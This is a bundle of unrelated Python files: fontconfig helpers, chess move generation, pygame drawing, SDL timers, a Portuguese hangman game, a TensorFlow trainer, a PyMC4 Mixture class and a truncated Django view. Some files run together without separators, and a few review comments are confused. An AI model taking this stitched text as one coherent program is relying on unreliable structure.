|
import argparse
import logging
import math
import os
import pathlib
import shutil
import subprocess
def app_path_arg_validate(path):
    """Validate that *path* names an existing, readable, executable file.

    Suitable as an argparse ``type=`` callable.

    Args:
        path: path-like value; converted with str() and made absolute.

    Returns:
        pathlib.Path: the absolute path.

    Raises:
        argparse.ArgumentTypeError: if the path is missing or lacks
            read/execute permission.
    """
    path = os.path.abspath(str(path))
    if not os.access(path, os.F_OK | os.R_OK | os.X_OK):
        raise argparse.ArgumentTypeError(
            f"Specified application could not be found: {path}")
    return pathlib.Path(path)


def add_app_path_arg(parser, *, app):
    """Add a ``--path-<app>`` option to *parser*.

    If *app* is found on PATH (and validates), that location becomes the
    default and the option is optional; otherwise the option is required.

    Args:
        parser: the argparse.ArgumentParser (or compatible) to extend.
        app (str): executable name to look up with shutil.which().
    """
    try:
        default = app_path_arg_validate(shutil.which(app))
    # Collapsed from three identical except clauses: TypeError covers
    # shutil.which() returning None; the others cover validation failures.
    except (argparse.ArgumentTypeError, TypeError, ValueError):
        default = None
    if default:
        # `help_text` (not `help`) avoids shadowing the builtin.
        help_text = f"Specify path for '{app}' application (optional)"
        required = False
    else:
        help_text = f"Specify path for '{app}' application"
        required = True
    parser.add_argument(
        f"--path-{app}",
        help=help_text,
        type=app_path_arg_validate,
        dest=f"path_{app}",
        default=default,
        required=required)
def run_and_parse_font_config_binary(binary, *, args, fields):
    """Run a fontconfig binary and parse one output value per requested field.

    Builds a ``--format`` string that separates the requested ``%{field}``
    values with an unlikely sentinel, runs the binary, and splits the output
    back into a ``{field: value}`` dict.

    Args:
        binary: path to the fontconfig executable (e.g. fc-match, fc-pattern).
        args (list): positional arguments to pass before ``--format``.
        fields (list[str]): fontconfig field names to extract.

    Raises:
        argparse.ArgumentTypeError: if the output does not split into exactly
            one value per requested field.
    """
    # Sentinel separator: newline, "/", the SOH control character (\1), "/",
    # newline — chosen so it cannot appear in real font family/style values.
    sep = "\n/\1/\n"
    format_string = sep.join(["%{" + field + "}" for field in fields])
    output = subprocess.check_output(
        [binary] + args + ["--format", format_string])
    output = output.decode("utf-8")
    values = output.split(sep)
    if len(values) != len(fields):
        raise argparse.ArgumentTypeError(
            f"Unable to parse fontconfig binary {binary} output: "
            f"expected {len(fields)} values for fields {fields}, but "
            f"got {len(values)}. Raw output: {output}.")
    return dict(zip(fields, values))
def font_file_arg(path):
    """Resolve a font argument to a concrete font file.

    If *path* is an existing file, return it resolved. Otherwise treat the
    value as a fontconfig pattern: ``fc-pattern`` parses the query and
    ``fc-match`` finds the best installed match; a warning is logged when the
    match only approximates the query.

    Args:
        path (str): a file path or a fontconfig pattern string.

    Raises:
        argparse.ArgumentTypeError: when *path* is not a file and the
            fontconfig binaries are not on PATH.
    """
    if pathlib.Path(path).exists():
        # BUG FIX: the original called .resolve() on the raw *str* argument,
        # which raised AttributeError on this branch; wrap in a Path first.
        return pathlib.Path(path).resolve()
    path_fc_pattern = shutil.which("fc-pattern")
    path_fc_match = shutil.which("fc-match")
    if not path_fc_pattern or not path_fc_match:
        raise argparse.ArgumentTypeError(
            f"Provided value ({path}) is not a file. Cannot parse as "
            f"[fontconfig] pattern because [fc-pattern] and [fc-match] "
            f"are not in path.")
    # What the user's query literally means...
    parsed_pattern = run_and_parse_font_config_binary(
        path_fc_pattern,
        args=[path],
        fields=["family", "style"])
    # ...versus the best installed match fontconfig can offer.
    best_guess = run_and_parse_font_config_binary(
        path_fc_match,
        args=[path],
        fields=["file", "family", "style"])
    file = best_guess["file"]

    def parse_style(style):
        # Normalize: a style list containing "regular" is the default style.
        style = style.lower()
        if "regular" in style.split(","):
            return ""
        return style

    best_guess["style"] = parse_style(best_guess["style"])
    parsed_pattern["style"] = parse_style(parsed_pattern["style"])
    if best_guess["family"] != parsed_pattern["family"] or \
            best_guess["style"] != parsed_pattern["style"]:
        # logging.warn is a deprecated alias; logging.warning is the API.
        logging.warning(
            f"Using font {best_guess['family']} ({best_guess['style']}) "
            f"from {file}, which approximately matches provided "
            f"query ({path}) which was interpretted as "
            f"{parsed_pattern['family']} ({parsed_pattern['style']})")
    return file
def safe_int_log(value, base):
    """Return the floor of log_base(value) as an exact integer.

    math.log works in floating point and can land one step off for values
    near exact powers of *base*; the two correction loops nudge the result
    until ``base ** result <= value < base ** (result + 1)`` holds exactly.
    """
    result = int(math.floor(math.log(value, base)))
    # Correct a possible overshoot from floating-point error...
    while base ** result > value:
        result -= 1
    # ...and a possible undershoot.
    while base ** (result + 1) <= value:
        result += 1
    return result
__all__ = ["add_app_path_arg", "safe_int_log"]
|
import abc
from chess import coords
from chess import move
# Unit step offsets (dx, dy) used by the sliding/jumping move generators.
BISHOP_DIRS = {(1, 1), (1, -1), (-1, 1), (-1, -1)}
ROOK_DIRS = {(0, 1), (0, -1), (-1, 0), (1, 0)}
KNIGHT_DIRS = {(2, 1), (2, -1), (1, 2), (1, -2), (-1, 2), (-1, -2), (-2, 1), (-2, -1)}
class Piece(abc.ABC):
    """Abstract base for chess pieces: position, colour, and ray move generation.

    NOTE(review): the capture logic below implies col=True pieces capture
    black pieces (i.e. col=True is white) — confirm the convention.
    """

    def __init__(self, pos: coords.Coords, col: bool):
        self.pos = pos
        self.col = col

    def moves_in_dir(self, board, direc: (int, int), limit=7):
        """Yield pseudo-legal moves stepping repeatedly by `direc` from `pos`.

        Stops at the board edge, after `limit` steps, or at the first
        occupied square; an enemy piece yields a capture before stopping.
        """
        x = self.pos.x + direc[0]
        y = self.pos.y + direc[1]
        while 0 <= x <= 7 and 0 <= y <= 7 and limit > 0:
            limit -= 1
            # white piece on the target square: capture only if we are not col
            if board.is_white_piece(coords.Coords(x, y)):
                if not self.col:
                    yield move.Move(self, self.pos, coords.Coords(x, y), capture = True)
                break
            # black piece on the target square: capture only if we are col
            if board.is_black_piece(coords.Coords(x, y)):
                if self.col:
                    yield move.Move(self, self.pos, coords.Coords(x, y), capture = True)
                break
            # open square: quiet move, keep sliding along the ray
            yield move.Move(self, self.pos, coords.Coords(x, y))
            x += direc[0]
            y += direc[1]

    def set_pos(self, pos: coords.Coords):
        self.pos = pos

    def value(self):
        # Packs `val` into one of two 6-bit lanes depending on colour
        # (shift 0 for col=True, shift 6 for col=False) — presumably a
        # colour-tagged encoding for the board; confirm.
        return self.val << (6 - self.col * 6)

    @abc.abstractmethod
    def generate_moves(self, board):
        pass

    @abc.abstractmethod
    def attacked_squares(self, board):
        pass

    @property
    @abc.abstractmethod
    def val(self):
        pass
class Pawn(Piece):
    """Pawn: single/double forward pushes plus diagonal captures."""

    def __str__(self):
        # Pawns carry no letter in algebraic notation.
        return ""

    def get_direc(self):
        # Forward y-step for this colour: +1 when col is False, -1 when True.
        return self.col * -2 + 1

    def generate_moves(self, board):
        # direction the pawn is going
        ny = self.pos.y + self.get_direc()
        if board.is_free(coords.Coords(self.pos.x, ny)):
            yield move.Move(self, self.pos, coords.Coords(self.pos.x, ny))
        # if pawn is on starting square (rank 1 for col=False, rank 6 for col=True)
        if self.pos.y == 1 + 5 * self.col:
            ny = self.pos.y + self.get_direc() * 2
            # NOTE(review): only the landing square is checked; a blocker on
            # the intermediate square also falls in this branch's first
            # is_free() test above only for single pushes — confirm double
            # pushes cannot jump over a piece.
            if board.is_free(coords.Coords(self.pos.x, ny)):
                yield move.DoublePawnMove(self, self.pos, coords.Coords(self.pos.x, ny))
        for s in self.attacked_squares(board):
            yield move.Move(self, self.pos, s, capture = True)

    def attacked_squares(self, board):
        # Diagonal squares one step forward that hold an enemy piece.
        # NOTE(review): empty diagonal squares are not reported, so this is
        # "capturable squares" rather than all attacked squares — may matter
        # for king-safety checks; confirm intended semantics.
        ny = self.pos.y + self.get_direc()
        if self.pos.x != 0:
            nx = self.pos.x - 1
            if board.is_black_piece(coords.Coords(nx, ny)):
                if self.col:
                    yield coords.Coords(nx, ny)
            if board.is_white_piece(coords.Coords(nx, ny)):
                if not self.col:
                    yield coords.Coords(nx, ny)
        if self.pos.x != 7:
            nx = self.pos.x + 1
            if board.is_black_piece(coords.Coords(nx, ny)):
                if self.col:
                    yield coords.Coords(nx, ny)
            if board.is_white_piece(coords.Coords(nx, ny)):
                if not self.col:
                    yield coords.Coords(nx, ny)
        # TODO En Passent

    @property
    def val(self):
        return 1
class Knight(Piece):
    """Knight: jumps one step along each of the eight L-shaped offsets."""

    def __str__(self):
        return "N"

    def generate_moves(self, board):
        # A knight is a "slider" of length exactly one per offset.
        for step in KNIGHT_DIRS:
            yield from self.moves_in_dir(board, step, limit=1)

    def attacked_squares(self, board):
        # Every pseudo-legal destination is an attacked square.
        yield from (mv.end for mv in self.generate_moves(board))

    @property
    def val(self):
        return 2
class Bishop(Piece):
    """Bishop: slides along diagonals until blocked or off the board."""

    def __str__(self):
        return "B"

    def generate_moves(self, board):
        for step in BISHOP_DIRS:
            yield from self.moves_in_dir(board, step)

    def attacked_squares(self, board):
        # Attacked squares coincide with pseudo-legal move destinations.
        yield from (mv.end for mv in self.generate_moves(board))

    @property
    def val(self):
        return 4
class Rook(Piece):
    """Rook: slides along ranks and files until blocked or off the board."""

    def __str__(self):
        return "R"

    def generate_moves(self, board):
        for step in ROOK_DIRS:
            yield from self.moves_in_dir(board, step)

    def attacked_squares(self, board):
        # Attacked squares coincide with pseudo-legal move destinations.
        yield from (mv.end for mv in self.generate_moves(board))

    @property
    def val(self):
        return 8
class Queen(Piece):
    """Queen: combines rook and bishop movement (all eight ray directions)."""

    def __str__(self):
        return "Q"

    def generate_moves(self, board):
        for step in BISHOP_DIRS | ROOK_DIRS:
            yield from self.moves_in_dir(board, step)

    def attacked_squares(self, board):
        # Attacked squares coincide with pseudo-legal move destinations.
        yield from (mv.end for mv in self.generate_moves(board))

    @property
    def val(self):
        return 16
class King(Piece):
    """King: one step in any of the eight directions (castling not handled here)."""

    def __str__(self):
        return "K"

    def generate_moves(self, board):
        # Same eight ray directions as the queen, capped at a single step.
        for step in BISHOP_DIRS | ROOK_DIRS:
            yield from self.moves_in_dir(board, step, limit=1)

    def attacked_squares(self, board):
        # Attacked squares coincide with pseudo-legal move destinations.
        yield from (mv.end for mv in self.generate_moves(board))

    @property
    def val(self):
        return 32
|
import pygame, time, random, settings,model

# Exit-door sprite, scaled to 100x50 and drawn at the fixed top-right slot.
car_exit=pygame.image.load('cartinki/EXIT.png')
car_exit=pygame.transform.scale(car_exit,[100,50])
exit_rect=pygame.Rect(900,0,100,50)

def paint(screen):
    """Draw one frame of the game onto *screen* and flip the display."""
    # draw the frame (translated from Russian: "рисуем кадр")
    pygame.draw.rect(screen, [100, 250, 200], [0, 0, 1300, 700], 0)  # background fill
    for security in model.blocks:
        pygame.draw.rect(screen,[100,250,50],security,10)  # obstacle blocks from the model
    pygame.draw.rect(screen, [250, 100, 10], model.platforma, 0)  # the platform
    screen.blit(car_exit,exit_rect)
    # pygame.draw.rect(screen,[0,0,0],exit_rect)
    # The moving circle (presumably the player) centred on model.krug.
    pygame.draw.circle(screen, [200, 0, 0], [model.krug.centerx, model.krug.centery], 20)
    pygame.display.flip()
# -*- coding: utf-8 -*-
__author__ = 'Jonathan Mulle & Austin Hurst'
from sdl2 import SDL_GetPerformanceCounter, SDL_GetPerformanceFrequency
# TODO: Clean up the docs and code here
def precise_time():
    """Returns the time (in seconds) since the task was launched.

    The time returned has sub-millisecond precision and is independent of the
    system's clock, so it won't be disrupted by things like network clock
    synchronization or daylight savings time.

    Should be used instead of Python's ``time.time()`` when precision is more
    important than getting a value that can be converted to real-world time.

    Returns:
        float: Seconds since the task was launched.
    """
    # Lazily cache the (constant) performance-counter frequency on the
    # function object the first time we are called.
    if not hasattr(precise_time, "freq"):
        precise_time.freq = float(SDL_GetPerformanceFrequency())
    return SDL_GetPerformanceCounter() / precise_time.freq
def time_msec():
    """Returns the time (in milliseconds) since the task was launched.

    See :func:`precise_time` for more info.

    Returns:
        float: Milliseconds since the task was launched.
    """
    seconds = precise_time()
    return seconds * 1000
class CountDown(object):
    """A timer that counts down to 0 for a given duration. Can be paused, reset, extended,
    and checked for time remaining or elapsed, making it flexible and useful for many different
    situations.

    Args:
        duration(float): The duration in seconds that the timer should count down for.
        start(bool, optional): Whether to start the countdown immediately upon creation. Defaults
            to True.

    Attributes:
        duration(float): The duration that the timer is set to count down for.
        started(bool): Whether the countdown timer has been started yet.
        paused(bool): The current pause state of the countdown timer.

    Raises:
        ValueError: if the duration specified is not a positive real number.
    """
    # Internal bookkeeping (name-mangled to _CountDown__*):
    __started = 0        # precise_time() timestamp at start, or 0 if never started
    __pause_time = 0.0   # cumulative seconds spent paused
    __flex = 0.0  # for add() and finish()
    __paused = False     # False while running; holds the pause timestamp while paused
    __duration = 0

    def __init__(self, duration, start=True):
        super(CountDown, self).__init__()
        self.duration = duration  # routed through the validating property setter
        self.reset(start)

    def start(self):
        """Starts the countdown if it has not started already.

        Raises:
            RuntimeError: If called after the countdown has already been started.
        """
        if not self.started:
            self.__started = precise_time()
            self.__paused = False
        else:
            err = "Cannot start CountDown that's already started (use reset method instead)."
            raise RuntimeError(err)

    def counting(self):
        """Indicates whether the timer is currently counting down or not.

        Returns:
            bool: False if the countdown is paused or has finished, otherwise True.
        """
        if self.paused:
            return False
        else:
            return self.remaining() > 0

    def reset(self, start=True):
        """Resets the countdown so it starts back at the original duration.

        Args:
            start(bool, optional): If True, the countdown will immediately start again after
                resetting. If False, the countdown will be reset into a paused state. Defaults
                to True.
        """
        self.__started = 0
        self.__pause_time = 0.0
        self.__flex = 0.0
        if start:
            self.start()
        else:
            self.pause()

    def finish(self):
        """Ends the countdown by jumping the time remaining directly to zero.
        """
        # Implemented as an add() of exactly the remaining time.
        self.__flex += self.remaining()

    def add(self, delta):
        """Add an amount of time to (or subtract an amount from) the elapsed time of the countdown.

        Note that a CountDown's time elapsed is clipped such that it can be no less than zero and
        no larger than the timer's set duration: for example, 'self.add(-100)' when 5 seconds has
        elapsed in the CountDown will only reduce the elapsed time to 0, and 'self.add(100)' when
        the CountDown's duration is 8 seconds will only increase the elapsed time to 8.

        Args:
            delta(float): The number of seconds to add to the countdown timer. Can be a positive
                or negative number.
        """
        if (self.elapsed() + delta) < 0:
            # ensure subtraction will never result in negative duration
            delta = 0 - self.elapsed()
        elif delta >= self.remaining():
            # end timer if duration added is greater than time remaining
            delta = self.remaining()
        self.__flex += delta

    def pause(self):
        """Pauses the countdown if it is not already paused. The countdown can later be resumed
        with the resume() method. Does nothing if the timer is already paused.
        """
        if not self.paused:
            # Storing the timestamp also makes the `paused` property truthy.
            self.__paused = precise_time()

    def resume(self):
        """Unpauses the countdown if it is currently paused. Does nothing if it is not paused.
        """
        if self.paused:
            # Accumulate the time spent in this pause, then clear the flag.
            self.__pause_time += precise_time() - self.__paused
            self.__paused = False

    def remaining(self):
        """Returns the amount of time remaining in the countdown (in seconds). Will return 0 if the
        countdown has ended.
        """
        return self.duration - self.elapsed()

    def elapsed(self):
        """Returns the amount of time elapsed in the countdown (in seconds). If the countdown has
        finished, the value returned will be equal to the countdown duration (e.g. 2.5 for a
        finished countdown with a duration of 2.5 seconds)
        """
        # Three cases: never started (only manual flex counts); currently
        # paused (freeze at the pause timestamp); running (use the clock now).
        if not self.started:
            t = self.__flex
        elif self.paused:
            t = (self.__paused + self.__flex) - (self.__started + self.__pause_time)
        else:
            t = (precise_time() + self.__flex) - (self.__started + self.__pause_time)
        return t if t < self.duration else self.duration

    @property
    def started(self):
        return self.__started != 0

    @property
    def paused(self):
        # __paused is either False or a timestamp; any timestamp means paused.
        return self.__paused is not False

    @property
    def duration(self):
        return self.__duration

    @duration.setter
    def duration(self, value):
        try:
            self.__duration = float(value)
        except ValueError:
            raise ValueError("Duration must be a positive real number.")
        # NOTE(review): compares the original `value`, not the parsed float;
        # a non-numeric-but-floatable input (e.g. a numeric string) would
        # raise TypeError here on Python 3 — confirm intended.
        if value <= 0:
            # Deliberately humorous error text preserved from the original.
            err = ("Authorization Denied: negative and null duration privileges restricted to "
                   "user dr_who.")
            raise ValueError(err)
class Stopwatch(object):
    """A timer that counts upwards and can be paused, resumed, and reset, just like a stopwatch.

    Args:
        start(bool, optional): Whether to start the stopwatch immediately upon creation. Defaults
            to True.

    Attributes:
        started(bool): Whether the stopwatch timer has been started yet.
        paused(bool): The current pause state of the stopwatch timer.
    """

    # Private state (class-level defaults, shadowed per instance on first write):
    __started = 0        # start() timestamp; 0 means "not started yet"
    __pause_time = 0.0   # total seconds spent paused so far
    __flex = 0.0         # manual adjustment accumulated via add()
    __paused = False     # pause() timestamp while paused, False while running

    def __init__(self, start=True):
        super(Stopwatch, self).__init__()
        if start: self.start()

    def start(self):
        """Starts the stopwatch if it has not started already.

        Raises:
            RuntimeError: If called after the stopwatch has already been started.
        """
        if self.__started == 0:
            self.__started = precise_time()
            self.__paused = False
        else:
            err = "Cannot start Stopwatch that's already started (use reset method instead)."
            raise RuntimeError(err)

    def reset(self, start=True):
        """Resets the stopwatch so it starts back at zero.

        Args:
            start(bool, optional): If True, the stopwatch will immediately start again after
                resetting. If False, the stopwatch will be reset into a paused state. Defaults
                to True.
        """
        # Wipe all accumulated state before (optionally) restarting.
        self.__started = 0
        self.__pause_time = 0.0
        self.__flex = 0.0
        if start:
            self.start()
        else:
            self.pause()

    def add(self, duration):
        """Add an amount of time to (or subtract an amount from) the stopwatch timer.

        Args:
            duration(float): The number of seconds to add to the stopwatch timer. Can be a positive
                or negative number.
        """
        self.__flex += duration

    def pause(self):
        """Pauses the stopwatch if it is not already paused. The stopwatch can later be resumed
        with the resume() method. Does nothing if the timer is already paused.
        """
        if not self.paused:
            self.__paused = precise_time()

    def resume(self):
        """Unpauses the stopwatch if it is currently paused. Does nothing if the timer is not
        paused.
        """
        if self.paused:
            # Fold the just-finished pause interval into the accumulator.
            self.__pause_time += precise_time() - self.__paused
            self.__paused = False

    def elapsed(self):
        """Returns the amount of time elapsed on the stopwatch (in seconds)."""
        if self.__started == 0:
            # Never started: only manual add() adjustments count.
            return self.__flex
        elif self.paused:
            # Frozen at the pause timestamp, net of earlier pauses.
            return (self.__paused + self.__flex) - (self.__started + self.__pause_time)
        else:
            # Running: wall clock since start, net of pauses, plus add() flex.
            return (precise_time() + self.__flex) - (self.__started + self.__pause_time)

    @property
    def started(self):
        # True once start() has recorded a timestamp.
        return self.__started != 0

    @property
    def paused(self):
        # __paused is a timestamp while paused and False otherwise.
        return self.__paused is not False
|
# -*- coding: utf-8 -*-
# Jogo da forca
# POO
# importar arquivos
# import random
# Criar tabuleiro usando LISTA
# Gallows drawings indexed by the number of wrong guesses (0-6). These are
# runtime strings printed to the player, so the text is kept verbatim.
# NOTE(review): leading whitespace appears to have been stripped from this
# copy of the file — restore the original art alignment from version control.
tabuleiro=['''
+----+
| |
|
|
|
|
==========''', '''
+----+
| |
O |
|
|
|
==========''','''
+----+
| |
O |
| |
|
|
==========''', '''
+----+
| |
O |
/| |
|
|
==========''', '''
+----+
| |
O |
/|\ |
|
|
==========''', '''
+----+
| |
O |
/|\ |
/ |
|
==========''', '''
+----+
| |
O |
/|\ |
/ \ |
|
==========''']
#Classe
class Hangman:
    """Hangman game state: the secret word plus right and wrong guesses."""

    def __init__(self, word):
        self.word = word
        self.errou_letra = []    # wrong letters guessed so far
        self.acertou_letra = []  # correct letters guessed so far

    def guess(self, letter):
        """Register a guessed letter.

        Returns:
            bool: True if the letter was newly registered (right or wrong),
            False if it had already been tried.
        """
        if letter in self.word and letter not in self.acertou_letra:
            self.acertou_letra.append(letter)
        elif letter not in self.word and letter not in self.errou_letra:
            self.errou_letra.append(letter)
        else:
            return False
        return True

    def forca_acabou(self):
        """The game ends on a win or after 6 wrong guesses (full gallows)."""
        return self.forca_ganhou() or (len(self.errou_letra) == 6)

    def forca_ganhou(self):
        """True when no letter of the word is still hidden."""
        if '_' not in self.hide_word():
            return True
        return False

    def hide_word(self):
        """Return the word with unguessed letters masked as '_'.

        Bug fix: the original assigned `rtn = ...` each iteration instead of
        appending, so only the final character was ever returned.
        """
        rtn = ''
        for letter in self.word:
            if letter not in self.acertou_letra:
                rtn += '_'
            else:
                rtn += letter
        return rtn

    def print_game_status(self):
        """Print the gallows drawing, the masked word and both guess lists."""
        # Bug fixes: the original referenced an undefined name `board` (the
        # module-level list is `tabuleiro`) and called the typo `prit`.
        print(tabuleiro[len(self.errou_letra)])
        print('\nPalavra: ' + self.hide_word())
        print('\nLetras erradas: ')
        for letter in self.errou_letra:
            print(letter, ' ', end='')
        print('Letras corretas:')
        for letter in self.acertou_letra:
            print(letter, ' ', end='')
def rand_word():
    """Return a random word from palavras.txt (one word per line).

    Bug fix: the original indexed with random.randint(0, len(bank)) whose
    upper bound is inclusive, so it raised IndexError one time in len+1.
    """
    import random  # local import: the module-level import is commented out
    with open('palavras.txt', 'rt') as f:
        bank = f.readlines()
    return random.choice(bank).strip()
def main():
    """Run one interactive game of hangman on the console."""
    game = Hangman(rand_word())
    while not game.forca_acabou():
        game.print_game_status()
        user_input = input('\nDigite uma letra: ')
        game.guess(user_input)
    # Show the final board before announcing the result.
    game.print_game_status()
    if game.forca_ganhou():
        print('Congrats you won!')
    else:
        print('Perdeu')
        # Typo fix in the user-facing message: 'palavrra' -> 'palavra'.
        print('A palavra era:' + game.word)

if __name__ == '__main__':
    main()
# Linear search over a fixed list, reporting the 1-based position of a match.
base = [3, 7, 20, 2, 11, 19, 96, 35, 15, 64]
found = False
position = -1  # 1-based index of the match; -1 while not found
guess = int(input("Enter a number : "))
# Fixes: removed the unused `loop` flag and a stray semicolon; use
# enumerate() instead of indexing with range(len(...)).
for index, value in enumerate(base):
    if guess == value:
        position = index + 1
        found = True
        break
if not found:
    print("Not found")
else:
    print("Found {0} at index {1}".format(guess, position))
|
"""
Copyright (c) 2020 R. Ian Etheredge All rights reserved.
This work is licensed under the terms of the MIT license.
For a copy, see <https://opensource.org/licenses/MIT>.
"""
from VisionEngine.base.base_trainer import BaseTrain
import tensorflow as tf
import numpy as np
import os
class KLWarmUp(tf.keras.callbacks.Callback):
    """Keras callback implementing cyclical linear KL-coefficient annealing.

    After every epoch the next value of the schedule is assigned to the
    `coef_kl` variable of each latent layer z_1..z_{n_latents}.
    """

    def __init__(
        self, n_iter=100, start=0.0, stop=1.0, n_cycle=4, ratio=0.5, n_latents=4
    ):
        # Bug fix: tf.keras.callbacks.Callback subclasses must call
        # super().__init__() so the base-class state is initialised.
        super(KLWarmUp, self).__init__()
        self.frange = self.frange_cycle_linear(
            n_iter, start=start, stop=stop, n_cycle=n_cycle, ratio=ratio
        )
        self.epoch = 0
        self.n_latents = n_latents

    def on_epoch_end(self, *args, **kwargs):
        # Robustness: clamp the index so training for more than n_iter epochs
        # keeps the final coefficient instead of raising IndexError.
        new_coef = self.frange[min(self.epoch, len(self.frange) - 1)]
        self.epoch += 1
        coefs = [
            self.model.get_layer(f"z_{i+1}").coef_kl for i in range(self.n_latents)
        ]
        for coef in coefs:
            coef.assign(new_coef)

    @staticmethod
    def frange_cycle_linear(n_iter, start=0.0, stop=1.0, n_cycle=4, ratio=0.5):
        """Return a length-n_iter array ramping start->stop n_cycle times.

        Within each cycle, the first `ratio` fraction ramps linearly; the
        remainder of the cycle stays at `stop`.
        """
        L = np.ones(n_iter) * stop
        period = n_iter / n_cycle
        step = (stop - start) / (period * ratio)  # linear schedule
        for c in range(n_cycle):
            v, i = start, 0
            while v <= stop and (int(i + c * period) < n_iter):
                L[int(i + c * period)] = v
                v += step
                i += 1
        return L
class Trainer(BaseTrain):
    """Builds the callback list from `config` and drives model.fit().

    Args:
        model: A compiled tf.keras model.
        data: Tuple of (train_dataset, validation_dataset).
        config: Hierarchical config object with exp/callbacks/trainer/
            data_loader/model sections.
    """

    def __init__(self, model, data, config):
        super(Trainer, self).__init__(model, data, config)
        self.callbacks = []
        self.loss = []
        self.init_callbacks()

    def init_callbacks(self):
        """Assemble the callback list driven by the callbacks/trainer config."""
        # Checkpoints go to $VISIONENGINE_HOME/<checkpoint_dir>/<exp name>.hdf5
        self.callbacks.append(
            tf.keras.callbacks.ModelCheckpoint(
                filepath=os.path.join(
                    os.getenv("VISIONENGINE_HOME"),
                    self.config.callbacks.checkpoint_dir,
                    "{}.hdf5".format(self.config.exp.name),
                ),
                monitor=self.config.callbacks.checkpoint_monitor,
                mode=self.config.callbacks.checkpoint_mode,
                save_best_only=self.config.callbacks.checkpoint_save_best_only,
                save_weights_only=self.config.callbacks.checkpoint_save_weights_only,
                verbose=self.config.callbacks.checkpoint_verbose,
                save_freq=self.config.callbacks.save_freq,
            )
        )
        self.callbacks.append(
            tf.keras.callbacks.TensorBoard(
                log_dir=os.path.join(
                    os.getenv("VISIONENGINE_HOME"),
                    self.config.callbacks.tensorboard_log_dir,
                ),
                write_graph=self.config.callbacks.tensorboard_write_graph,
                write_images=self.config.callbacks.tensorboard_write_images,
                histogram_freq=self.config.callbacks.tensorboard_histogram_freq,
            )
        )
        if self.config.trainer.use_lr_scheduler is True:
            # Log-spaced learning-rate sweep, one value per epoch:
            # 10**lr_start .. 10**lr_stop.
            lr_epochs = 10 ** np.linspace(
                self.config.trainer.lr_start,
                self.config.trainer.lr_stop,
                self.config.trainer.num_epochs,
            )
            self.callbacks.append(
                tf.keras.callbacks.LearningRateScheduler(lambda i: lr_epochs[i])
            )
        if self.config.trainer.use_early_stopping is True:
            self.callbacks.append(
                tf.keras.callbacks.EarlyStopping(
                    min_delta=self.config.trainer.min_delta,
                    patience=self.config.trainer.patience,
                    monitor=self.config.trainer.early_stopping_monitor,
                )
            )
        if self.config.trainer.use_kl_warmup is True:
            # Cyclical KL-coefficient annealing (see KLWarmUp above).
            self.callbacks.append(
                KLWarmUp(
                    n_iter=self.config.trainer.kl_wu_n_iter,
                    start=self.config.trainer.kl_wu_start,
                    stop=self.config.trainer.kl_wu_stop,
                    n_cycle=self.config.trainer.kl_wu_n_cycle,
                    ratio=self.config.trainer.kl_wu_ratio,
                    n_latents=self.config.model.n_latents,
                )
            )

    def train(self):
        """Fit the model on the (train, validation) datasets in self.data."""
        self.model.fit(
            self.data[0],
            epochs=self.config.trainer.num_epochs,
            callbacks=self.callbacks,
            validation_data=self.data[1],
            # Step counts are derived from the sample count and the
            # validation split; the +1 keeps the final partial batch.
            steps_per_epoch=int(
                (1 - self.config.data_loader.validation_split)
                * self.config.data_loader.n_samples
                / self.config.trainer.batch_size
                + 1
            ),
            validation_steps=int(
                self.config.data_loader.validation_split
                * self.config.data_loader.n_samples
                / self.config.trainer.batch_size
                + 1
            ),
            use_multiprocessing=True,
        )
        # we save the best model during training, don't need this
        # self.model.save_weights(
        #     os.path.join(os.getenv("VISIONENGINE_HOME"),
        #     self.config.callbacks.checkpoint_dir,
        #     '%s-{epoch:02d}-{loss:.2f}.hdf50' % self.config.exp.name)
        # )
|
from .random_variable import RandomVariable, TensorLike
from tensorflow_probability import distributions as tfd
import pymc4 as pm
from typing import List
class Mixture(RandomVariable):
    r"""
    Mixture random variable.

    Often used to model subpopulation heterogeneity

    .. math:: f(x \mid w, \theta) = \sum_{i = 1}^n w_i f_i(x \mid \theta_i)

    ========  ============================================
    Support   :math:`\cap_{i = 1}^n \textrm{support}(f_i)`
    Mean      :math:`\sum_{i = 1}^n w_i \mu_i`
    ========  ============================================

    Parameters
    ----------
    p : array of floats
        p >= 0 and p <= 1
        the mixture weights, in the form of probabilities
    distributions : multidimensional PyMC4 distribution (e.g. `pm.Poisson(...)`)
        or iterable of one-dimensional PyMC4 distributions the
        component distributions :math:`f_1, \ldots, f_n`

    Developer Notes
    ---------------
    Mixture models must implement _base_dist (just as any other RV), but
    we must explicitly return the self._distribution object when implementing
    a new mixture distribution. This ensures that log_prob() calculations work correctly.
    For an example, see below an example taken from the last line of _base_dist in the
    ZeroInflatedPoisson distribution implementation (in discrete.py).

    .. code::

        def _base_dist(self, psi, theta, *args, **kwargs):
            return pm.Mixture(
                p=[psi, 1.0 - psi],
                distributions=[
                    pm.Constant(name="Zero", value=0),
                    pm.Poisson(name="Poisson", mu=theta)
                ],
                name="ZeroInflatedPoisson",
            )._distribution  # <---- this is key!

    Compared to PyMC3's API, the Mixture API is slightly changed to make things
    smoother for end-users.

    Firstly, end-users may find it to be extra work to specify that they want the
    distribution objects for each RV. Hence, the Mixture RV will automatically
    grab out the ._distribution object for each RV object passed in. Hence, users
    need only specify the PyMC4 RV object.

    This first point also makes things hopefully maps better to how end-users abstract
    and think about distributions. Our average user probably doesn't distinguish
    very clearly between an RV and a distribution object, though we know to do so.
    Otherwise, we would not have had questions that Junpeng had to answer on discourse
    regarding how to create mixture distributions in which end-users simply forgot to
    add ``.distribution`` at the end of their distribution calls.

    Secondly, we use the "p" and "distributions", rather than the old "w" and "comp_dists"
    kwargs. During the PyMC4 API development, this is probably the only place where I
    (Eric Ma) have chosen to deviate from the old API, hopefully as an improvement for
    newcomers' mental model of the API.
    """

    def _base_dist(self, p: TensorLike, distributions: List[RandomVariable], *args, **kwargs):
        # A Categorical over the weights selects the active component; the
        # underlying TFP distribution object is extracted from each PyMC4 RV
        # (see the Developer Notes above) before handing them to tfd.Mixture.
        return tfd.Mixture(
            cat=pm.Categorical(p=p, name="MixtureCategories")._distribution,
            components=[d._distribution for d in distributions],
            name=kwargs.get("name"),
        )
|
from django.shortcuts import render,redirect
from .models import Products,Category,Tags
from django.http import HttpResponse
from .forms import ProductForm
# Create your views here.
def home(request):
    """Render the landing page listing every product."""
    all_products = Products.objects.all()
    context = {'products': all_products}
    return render(request, 'home.html', context)
def add(request):
    """Create a new product from the upload form.

    Bug fix: the original only rendered the form in the non-POST branch, so
    a POST with an invalid form returned None (no HttpResponse). Now the
    bound form (with its validation errors) is re-rendered in that case.
    """
    form = ProductForm()
    if request.method == 'POST':
